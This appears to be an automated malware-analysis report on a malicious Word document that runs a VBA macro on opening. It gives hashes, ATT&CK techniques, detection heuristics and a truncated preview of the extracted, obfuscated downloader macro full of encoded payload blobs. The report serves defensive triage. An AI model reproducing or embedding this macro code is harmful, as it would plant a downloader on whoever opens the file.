Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0146653cc94a49c9…

MALICIOUS

Office (OLE)

170.0 KB Created: 2018-03-22 15:07:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: 75d7e03060f16dc62504b137e6bd544b SHA-1: 5afbfa573c8e78367c6a11f96a6c3ac1e6b112f1 SHA-256: 0146653cc94a49c9f9d37c1d3a183203b32e0c62419bb8dfc351db3d18513af7
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate or Obfuscate Malicious Code T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicating it's designed to execute automatically upon opening. The presence of a long encoded blob and the ClamAV detection signature 'Doc.Malware.Emodldr-10025032-0' strongly suggest the macro's purpose is to download and execute a second-stage payload, likely a downloader or dropper.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44190 bytes
SHA-256: e45165470d60b4574e17b0b6aae1ac991946483960d24d70fb2449f1485bf772
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 26 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CjPvDKPoXlDw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TwXGufNT"
Function wRnJFiczIE()
On Error Resume Next
Select Case oAzEB
         Case 38546
            wFjYZH = Hex(29258 - CSng(77965) - 88024 + ChrW(CWAbtC))
            mKlaf = WPwkmj
End Select
UbiSV = ukDJfH("ZMAOQAzAGQANQA3ADUAOQAzAGMAYgBhADIAMQA5AGQAOABmADAAMgA0ADgANQA0AGEAMwA4AGIANgAxADcANgAwADkAZgBiADcAMAAxADMAYgAyAGMAZAAwADkAOQBmADQAMABkADkANQA3ADgAYgAzADcAYwAyAGQAOAA5ADYAYQBlAGMAOQBjAGUAz4jZ5%a", 3, 185)
Select Case tDUOoA
         Case 12607
            MwLbqv = Hex(2362 - CSng(69173) - 31131 + ChrW(uzhRr))
            PSQMId = cIJzz
End Select
Select Case sLBsnP
         Case 99369
            ZdPQrT = Hex(81729 - CSng(98824) - 48973 + ChrW(oSnVd))
            iujss = kDnGZz
End Select
dYNjvOldcN = ukDJfH("wDGAZQBiAGIAZQBiADEAYwBlADEAMQBhAGEAYgA1ADQAMAAxADcAMwBhADMANgAyADMAZQBhADIAYgA2AGIAMABkADcAZAA1AGEAZAA5ADMAMQA0ADIANQBhADIAYQA2AGUAMAA4ADMAZgBmADQAOABmAGYAMgA3AGUAMwBkADEAMQA3AGIAMwA5ADMAYgA1ADMAk6P", 4, 193)
Select Case aCYqk
         Case 65767
            DhKGB = Hex(64746 - CSng(70354) - 66146 + ChrW(LtXhdN))
            jHBdsM = kurzwz
End Select
Select Case SvPvC
         Case 79669
            roimD = Hex(2127 - CSng(37830) - 68028 + ChrW(AvGrW))
            icZzm = OqXZKD
End Select
vHGnTzEAIj = ukDJfH("tPl1oKZQAxADkANgAzADcAZgA5ADkAMwBiADMANwBmAGEAZgA5AGMAMABiADgAMgAzAGUAZQBmADMANwBjADEAMQA0ADgAMgBlAGQAZAAxADIAMQBjADEANAA5AGIAOAA2AGUAYgBkADUAZQA3AGUAYQBiADQAvk", 7, 152)
Select Case fMqliZ
         Case 55820
            FsoJzw = Hex(41599 - CSng(50425) - 45757 + ChrW(zwPMm))
            FDkcw = NtztE
End Select
Select Case zDjXhO
         Case 32219
            RNjTNS = Hex(40574 - CSng(16509) - 14096 + ChrW(kICLt))
            wzpdIR = ZKEsfB
End Select
izkNarwztkl = ukDJfH("zwnPADEAMgA5ADkANwBjADQANgA5AGQANQAwADMAYQA2AGIAMwAwADYAYQA4ADYANQAzADcANwBkAGYAYQRPv%j", 5, 78)
Select Case IPbobz
         Case 53
            bJPiKa = Hex(2305 - CSng(85274) - 51736 + ChrW(JkbkZn))
            zfJIIZ = HKQVjO
End Select
Select Case ivFnnO
         Case 12551
            JQATDv = Hex(79222 - CSng(52145) - 69036 + ChrW(wlHla))
            jNUNIl = kdIZiE
End Select
ACpiqnvi = ukDJfH("BF2EAPQA9AHwANwBiADUAOQBhADEAMgBhADUAZAAxAGQAMwBhADUAZQA5AGIAMgBiAGQANgA1AGYAMQA5ADMANAA2ADAAYwAyADEANAAxADYAYwBhADkAMgAzADcAZgA2ADcAMgA4AGQANgA0ADQAMAAyADkAOQA1ADUAv3To", 4, 162)
Select Case PhhNwj
         Case 85071
            NERFUw = Hex(94428 - CSng(55910) - 84527 + ChrW(UMDaut))
            XhPpvW = WpzRE
End Select
Select Case zJnnF
         Case 7056
            rCGozj = Hex(76075 - CSng(22823) - 87969 + ChrW(IFSFVM))
            iRzSu = bwsoY
End Select
ftaVjsVB = ukDJfH("rYNQBiAGMANAA0ADkANAA4ADAAMQAxADEANwBmADQANgA5AGMAYQjW4tSQ", 3, 50)
Select Case ttjQIw
         Case 9341
            iSCsV = Hex(39136 - CSng(22025) - 62916 + ChrW(BAiwa))
            nEMwh = pFrOYz
End Select
Select Case lalWOj
         Case 55348
            FrwGIO = Hex(76388 - CSng(76973) - 53655 + ChrW(iiUDzA))
            UQRVw = QHnzG
End Select
PrLui = ukDJfH("XWRjKSAYgA0AGEAOQBhAGUAMgAxAGMA'|coNvErttO-seCURESTRINg iFZ", 7, 50)
Select Case IPhjtw
         Case 2939
            wUkRNM = Hex(82219 - CSng(37906) - 25349 + ChrW(hblCt))
            KdIYi = VRhGTX
End Select
Select Case tOhiv
         Case 7940
            hwiRq = Hex(54506 - CSng(50569) - 11948 + ChrW(wKsVu))
            jmLTF = Awpaw
End Select
naGvU = ukDJfH("G0oGQBmADkAMQBiAGQAYwA0AGMAMwAyADYAMABlADMAOAA1AGEAMQBlADQAZQAwADgAMAA0ADYANwA0ADAANgA1ADQAMAAzADQAOAA3ADkAYgBmAGYAZAA4ADQAZABhAGMAMwA1ADEAZQA0AGIAOABjAGUAZQBjAGEAYwBjADYUvY", 6, 165)
Select Case SFmHa
         Case 94015
            iCNrkI = Hex(27962 - CSng(68125) - 86225 + ChrW(OiNPY))
            vScwEh = prtEI
End Select
Selec
... (truncated)